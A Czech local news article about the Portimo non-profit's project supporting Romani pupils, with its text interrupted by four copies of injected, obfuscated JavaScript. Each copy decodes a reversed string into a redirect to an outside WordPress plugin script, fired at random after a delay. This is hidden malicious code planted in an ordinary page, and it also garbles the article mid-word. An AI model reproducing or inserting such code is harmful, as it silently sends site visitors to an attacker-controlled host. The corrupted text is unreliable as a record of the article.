Rainbow page separator

Projekt pro podporu vzdělávání se ve Městě chýlí ke konci

Sobota, 19. března 2016

Projekt pro podporu vzdělávání se ve Městě chýlí ke konci

Nové Měs["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / K závěru se blíží projekt Škola nemusí být nuda, kterým se již rok zabývá novoměstská obecně prospěšná společnost Portimo. Má podpořit především romské děti a mládež, aby mezi nimi přibylo těch, kdo úspěšně zvládnou vzdělávání v základní i střední škole. Pracovníci a dobrovolníci Portima při["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom využívají zážitkovou pedagogiku a zajímavé pomůcky, díky kterým mohou děti zažít učení jinak, než je běžné. „Smyslem projektu není pouhé „doučování“. Naším cílem je posílit kompetence k učení také z hlediska samostatnosti, spolupráce ve skupině a komunikačních dovedností. Kritériem rozhodně není pouhá „lepší známka“, ale skutečný osobní pokrok v čase,“ uvedla ředitelka společnosti Portimo Ruth Šormová. Do projektu se během roku zapojilo 93 dětí a mladých lidí. Práce podle slov ředitelky přinesla i konkrétní výsledky - u několika dětí zlepšení školních výsledků, impuls k většímu zájmu o vzdělávání, zlepšila se komunikace s některými učiteli i rodiči. Motivační odměny nejvytrvalejším účastníkům umožnily šesti dětem zapojit se do celoročních zájmových aktivit podle vlastního výběru.